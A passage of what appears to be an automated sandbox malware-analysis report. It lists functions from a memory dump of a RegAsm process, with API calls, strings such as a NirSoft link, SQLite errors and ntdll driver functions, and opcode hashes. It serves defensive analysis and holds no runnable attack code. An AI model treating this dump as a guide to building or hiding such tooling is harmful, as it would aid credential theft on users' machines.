                                                                                                                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                • String ID: caption
                                                                                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                • String ID: \systemroot
                                                                                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                Function 0041352F Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                • API String ID: 4139908857-2887671607
                                                                                                                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                Function 00410863 Relevance: 16.6, APIs: 11, Instructions: 116COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                • memset.MSVCRT ref: 00410892
                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?), ref: 004108A4
                                                                                                                                                                                • SHGetFileInfoW.SHELL32(?,?,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 810783-0
                                                                                                                                                                                • Opcode ID: 0710fc4de5d6c377d3cd2b1b6d302d128b718a6008256e86d6ad279fb218f044
                                                                                                                                                                                • Instruction ID: 187436efbcf11a04baa8b208573f6a87aa51d9c8c8fb0e44f934d7d274fcaebe
                                                                                                                                                                                • Opcode Fuzzy Hash: 0710fc4de5d6c377d3cd2b1b6d302d128b718a6008256e86d6ad279fb218f044
                                                                                                                                                                                • Instruction Fuzzy Hash: C441A4B1540304BFF721AF71CC4AF977B98FB49744F000829F3989A0E1CAB6A9509B29
                                                                                                                                                                                Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                • API String ID: 1284135714-318151290
                                                                                                                                                                                • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                • String ID: 4$h
                                                                                                                                                                                • API String ID: 4019544885-1856150674
                                                                                                                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 290601579-0
                                                                                                                                                                                • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memchrmemset
                                                                                                                                                                                • String ID: PD$PD
                                                                                                                                                                                • API String ID: 1581201632-2312785699
                                                                                                                                                                                • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2163313125-0
                                                                                                                                                                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$wcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3592753638-3916222277
                                                                                                                                                                                • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                                                                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                                                                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                • String ID: %s (%s)$YV@
                                                                                                                                                                                • API String ID: 3979103747-598926743
                                                                                                                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                • API String ID: 2767993716-572158859
                                                                                                                                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                                                                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                • database is already attached, xrefs: 0042F721
                                                                                                                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                • out of memory, xrefs: 0042F865
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
